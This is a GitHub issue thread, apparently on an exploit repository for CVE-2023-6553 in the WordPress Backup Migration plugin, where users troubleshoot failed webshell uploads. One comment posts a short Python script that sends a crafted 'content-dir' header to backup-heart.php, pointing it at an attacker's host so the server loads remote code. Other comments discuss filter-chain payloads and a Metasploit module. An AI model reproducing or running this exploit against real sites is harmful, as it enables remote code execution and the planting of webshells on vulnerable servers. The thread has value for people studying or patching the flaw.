CVE-2023-6553 icon indicating copy to clipboard operation
CVE-2023-6553 copied to clipboard

Published 20 hours ago verified publisher icon Chocapikk

404 not found

Open zzZxby opened this issue 1 year ago • 15 comments
trafficstars

I used version 1.3.6 of backup-backup for testing, but it returned a 404 error and the Trojan horse was not successfully uploaded. What could be the reason for this? image image

zzZxby avatar Dec 14 '23 07:12 zzZxby

Yeah I have to add more checks in the code. Not yet reliable enough. It's a v1. I will take care of it soon. Thanks for the feedback

Chocapikk avatar Dec 14 '23 07:12 Chocapikk

I just got it. I assume you are using Windows. Due to the headers length limit I use a system command to write the webshell. Except it's a linux command and not windows. That's why it's not working here. And I only check the status code and not the length of the content of /includes/backup-heart.php to verify that the characters are correctly written on the server

Chocapikk avatar Dec 14 '23 07:12 Chocapikk

I've fixed this, thank you very much

zzZxby avatar Dec 14 '23 08:12 zzZxby

Can you make a PR or share what you did? I could also modify for windows ^^ Thanks

Chocapikk avatar Dec 14 '23 08:12 Chocapikk

I wrote a simple Python script to send packets myself and didn't use your exploit.

zzZxby avatar Dec 14 '23 08:12 zzZxby

import requests

url = 'http://172.18.1.141:80/wordpress/wp-content/plugins/backup-backup/includes/backup-heart.php' content_dir = 'http://172.18.1.2:8000/'

headers = {'content-dir': content_dir} response = requests.post(url, headers=headers)

print(response.text) # 处理响应数据

zzZxby avatar Dec 14 '23 08:12 zzZxby

thank you very much again

zzZxby avatar Dec 14 '23 08:12 zzZxby

Oh ok I understand you used a remote URL to use a shell. Yeah, great. Not sure if it will work with all web server configs. Thanks also

Chocapikk avatar Dec 14 '23 08:12 Chocapikk

Guys, any reason filter chain might not work (other than http header size limit)? Web Server - Apache 2.4/Ubuntu 22.04 Plugin - 1.3.6/1.3.7

I get 200 response but nothing really happens in the end.

N00BIER avatar Jan 25 '24 13:01 N00BIER

Okay. Well, it's surprising, was a file still written to your lab? Recently I modified to native php for the payload and it worked. With lack of information I can't know.

Chocapikk avatar Jan 25 '24 13:01 Chocapikk

Okay. Well, it's surprising, was a file still written to your lab? Recently I modified to native php for the payload and it worked. With lack of information I can't know.

Nothing gets uploaded to /includes. I've also increased the limit of http header size... I am using web server (Apache 2.4) in docker container listening to http://X.X.X.X:8000. Wordpress 6.0.1 with Backup Migration 1.3.7

N00BIER avatar Jan 25 '24 14:01 N00BIER

Honestly, I don't have a solution at this point. It's already complicated enough to exploit. Feel free to debug if you have a solution I will update it. There was recently a metasploit module that does this. Have you tried with that too?

Chocapikk avatar Jan 25 '24 14:01 Chocapikk

For some reason metasploit (Kali) fails to load the module multi/http/wp_backup_migration_php_filter. The framework is up to date v6.3.51-dev

N00BIER avatar Jan 25 '24 15:01 N00BIER

Okay, so I have no idea either. Open an "issue" to metasploit in this case. Sorry

Chocapikk avatar Jan 25 '24 15:01 Chocapikk

no problem, I'll get back if any findings

N00BIER avatar Jan 25 '24 15:01 N00BIER